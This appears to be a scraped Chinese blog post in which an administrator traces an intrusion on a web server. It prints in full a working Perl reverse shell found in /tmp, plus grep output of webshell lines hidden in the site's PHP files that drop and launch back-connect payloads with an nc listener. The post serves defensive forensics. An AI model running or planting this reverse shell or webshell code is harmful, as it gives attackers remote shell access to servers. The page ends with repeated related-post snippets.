Web伺服器捉蟲速記

2021-09-04 09:08:30 字數 4725 閱讀 5252

web

伺服器捉蟲速記

馬上登入伺服器(半夜好睏啊)。執行如下的步驟: 1、

檢查系統帳號,看有沒有異常帳號

--如冒充系統帳號,改乙個字母,看起來像系統帳號,混淆視聽。有的傢伙狡猾的幹活,建立個帳號為「

…」極端不易察覺。 2、

檢查最近登入使用者的ip:

last 檢視9

月9號以後到目前的情況,經確認,有乙個

ip來路不對。 3、

檢查系統初始化檔案

inittab,

執行級別為

3,為發現異常。一些

hacker

喜歡在這裡下手,加上

respawn

這樣的行,保證他的程式被殺後自動重啟,不屈不撓地抗爭系統管理員的絞殺。 4、

檢查執行級別目錄的指令碼,

ls –al /etc/rc3.d ,

未見異常。 5、

檢查自動任務

crontab –l

,root

使用者和web

執行使用者

www各檢查一遍,未見任何異常。 6、

檢查歷史記錄

history

發現有安裝

sendmail

的情形,問客戶是否有這個,答:不是自己裝的。 7、

檢查web

目錄,發現其許可權為

777,這可讓人不太放心了,心中猜想,可能是從這裡下手了。 8、

檢查一下目錄

/tmp,

發現有個檔案不太對勁,檔名是

spider_bc

,開啟看一下,是個

perl

指令碼,其內容為:

[root@localhost mysql]#more  /tmp/spider_bc

#!/usr/bin/perl

use socket;

$cmd= "lynx";

$system= 'echo "`uname -a`";echo"`id`";/bin/sh';

$0=$cmd;

$target=$argv[0];

$port=$argv[1];

$iaddr=inet_aton($target) || die("error: $!\n");

$paddr=sockaddr_in($port, $iaddr) || die("error: $!\n");

$proto=getprotobyname('tcp');

socket(socket, pf_inet, sock_stream, $proto) || die("error: $!\n");

connect(socket, $paddr) || die("error: $!\n");

open(stdin, ">&socket");

open(stdout, ">&socket");

open(stderr, ">&socket");

system($system);

close(stdin);

close(stdout);

close(stderr);

據客戶開發人員反應,這檔案刪除以後,一會又自動生成了。 9、

初步懷疑是

hacker

利用web

許可權設定及程式漏洞上傳了程式後,自動生成這個檔案,於是進入到**根目錄,然後執行

grep –r 「spider」 * ,

片刻,結果出來了,下面節錄部分:

[root@localhost www]#grep spider_bc * -r

/plusbak/viev.php:                        echo file_write('/tmp/spider_bc',base64_decode($back_connect_pl),'wb') ? '

建立/tmp/spider_bc

成功' : '

建立/tmp/spider_bc

失敗';

/plusbak/viev.php:                        echo exec_run($perlpath.' /tmp/spider_bc '.$_post['yourip'].' '.$_post['yourport'].' &') ? 'nc -l -n -v -p '.$_post['yourport'] : '

執行命令失敗

';/plusbak/viev.php:                        echo file_write('/tmp/spider_bc.c',base64_decode($back_connect_c),'wb') ? '

建立/tmp/spider_bc.c

成功' : '

建立/tmp/spider_bc.c

失敗';

/plusbak/viev.php:                        @unlink('/tmp/spider_bc.c');

/plusbak/viev.php:                        echo exec_run('/tmp/spider_bc '.$_post['yourip'].' '.$_post['yourport'].' &') ? 'nc -l -n -v -p '.$_post['yourport'] : '

執行命令失敗

';/developers/fckeditor/editor/skins/images/images.php:                     echo file_write('/tmp/spider_bc',base64_decode($back_connect_pl),'wb') ? '

建立/tmp/spider_bc

成功' : '

建立/tmp/spider_bc

失敗';

/developers/fckeditor/editor/skins/images/images.php:                     echo exec_run($perlpath.' /tmp/spider_bc '.$_post['yourip'].' '.$_post['yourport'].' &') ? 'nc -l -n -v -p '.$_post['yourport'] : '

執行命令失敗

';/developers/fckeditor/editor/skins/images/images.php:                     echo file_write('/tmp/spider_bc.c',base64_decode($back_connect_c),'wb') ? '

建立/tmp/spider_bc.c

成功' : '

建立/tmp/spider_bc.c

失敗';

/developers/fckeditor/editor/skins/images/images.php:                     @unlink('/tmp/spider_bc.c');

/developers/fckeditor/editor/skins/images/images.php:                     echo exec_run('/tmp/spider_bc '.$_post['yourip'].' '.$_post['yourport'].' &') ? 'nc -l -n -v -p '.$_post['yourport'] : '

執行命令失敗

';/developers/developers/cache/default/index_sql.php :                      echo file_write('/tmp/spider_bc',base64_decode($back_connect_pl),'wb') ? '

建立/tmp/spider_bc

成功' : '

建立/tmp/spider_bc

失敗';

/developers/developers/cache/default/index_sql.php :                      echo exec_run($perlpath.' /tmp/spider_bc '.$_post['yourip'].' '.$_post['yourport'].' &') ? 'nc -l -n -v -p '.$_post['yourport'] : '

執行命令失敗

';/developers/developers/cache/default/index_sql.php :                      echo file_write('/tmp/spider_bc.c',base64_decode($back_connect_c),'wb') ? '

建立/tmp/spider_bc.c

成功' : '

建立/tmp/spider_bc.c

失敗';

/developers/developers/cache/default/index_sql.php :                      @unlink('/tmp/spider_bc.c');

/developers/developers/cache/default/index_sql.php :                      echo exec_run('/tmp/spider_bc '.$_post['yourip'].' '.$_post['yourport'].' &') ? 'nc -l -n -v -p '.$_post['yourport'] : '

執行命令失敗';9

、問題基本查明,告知各方,先簡單恢復,明日再戰。

Web伺服器捉蟲速記

web 伺服器捉蟲速記 馬上登入伺服器 半夜好睏啊 執行如下的步驟 1 檢查系統帳號,看有沒有異常帳號 如冒充系統帳號,改乙個字母,看起來像系統帳號,混淆視聽。有的傢伙狡猾的幹活,建立個帳號為 極端不易察覺。2 檢查最近登入使用者的ip last 檢視9 月9號以後到目前的情況,經確認,有乙個 ip...

Web伺服器捉蟲速記

web 伺服器捉蟲速記 馬上登入伺服器 半夜好睏啊 執行如下的步驟 1 檢查系統帳號,看有沒有異常帳號 如冒充系統帳號,改乙個字母,看起來像系統帳號,混淆視聽。有的傢伙狡猾的幹活,建立個帳號為 極端不易察覺。2 檢查最近登入使用者的ip last 檢視9 月9號以後到目前的情況,經確認,有乙個 ip...

web伺服器 簡單web伺服器實現

三次握手 一般情況下是瀏覽器先傳送請求資料,c s ack 應答 三次握手成功後,才開始進行通訊資料的收發。四次揮手 一般情況下是客戶端先關閉,給瀏覽器傳送關閉資訊。如果瀏覽器傳送了關閉資訊,但是伺服器沒有回過去,較慢 那麼瀏覽器一直發是不是就會有問題?所以會等待 2msl的時間。一般為2 5分鐘。...